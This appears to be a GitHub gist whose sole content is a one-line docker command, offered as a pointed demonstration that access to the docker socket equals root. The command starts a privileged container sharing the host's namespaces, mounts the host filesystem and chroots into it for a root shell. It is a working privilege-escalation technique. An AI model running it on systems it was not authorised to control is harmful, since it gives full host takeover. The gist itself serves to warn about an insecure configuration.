Last active
January 8, 2022 21:31
-
-
Save iavael/f5ec366b047b50beac7885f3d34d7058 to your computer and use it in GitHub Desktop.
Everything you need to know about compatibility of security with unlimited access to docker socket
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
docker run -it --rm --uts=host --pid=host --net=host --userns=host -v /:/tmp/root busybox chroot /tmp/root sh -l |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment